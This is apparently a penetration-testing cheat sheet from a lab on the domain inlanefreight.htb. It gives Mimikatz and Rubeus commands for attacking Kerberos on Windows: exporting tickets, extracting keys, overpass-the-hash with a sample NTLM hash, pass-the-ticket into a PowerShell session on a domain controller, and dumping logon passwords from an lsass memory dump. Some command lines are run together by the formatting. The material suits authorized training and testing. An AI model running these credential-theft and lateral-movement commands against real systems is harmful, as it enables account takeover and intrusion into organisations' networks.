Mimikatz
Mimikatz - Export Tickets
mimikatz.exeprivilege::debugsekurlsa::tickets /exportexitThe tickets that end with
$correspond to the computer account, which needs a ticket to interact with the Active Directory.User tickets have the user's name,
followed by an
@that separates the service name and the domain, for example:[randomvalue][email protected].
We can also export tickets using Rubeus and the option dump
This option can be used to dump all tickets (if running as a local administrator).
Rubeus dump, instead of giving us a file, will print the ticket encoded in base64 format. We are adding the option/nowrapfor easier copy-paste.
Mimikatz - Extract Kerberos Keys
mimikatz.exe
privilege::debug
sekurlsa::ekeysMimikatz - Pass the Key or OverPass the Hash
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50fMimikatz - Pass the Ticket
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680][email protected]"Mimikatz - PowerShell Remoting with Pass the Ticket
mimikatz.exeprivilege::debugkerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a][email protected]"exitpowershellEnter-PSSession -ComputerName DC01[DC01]: PS C:\Users\john\Documents> whoami[DC01]: PS C:\Users\john\Documents> hostnameMimikatz - If you already have lsass.dmp
Note: It is always a good idea to type "log" before running any commands in "Mimikatz" this way all command output will put output to a ".txt" file.
This is especially useful when dumping credentials from a server which may have many sets of credentials in memory.
mimikatz.exelogsekurlsa::minidump lsass.dmpsekurlsa::logonpasswordsLast updated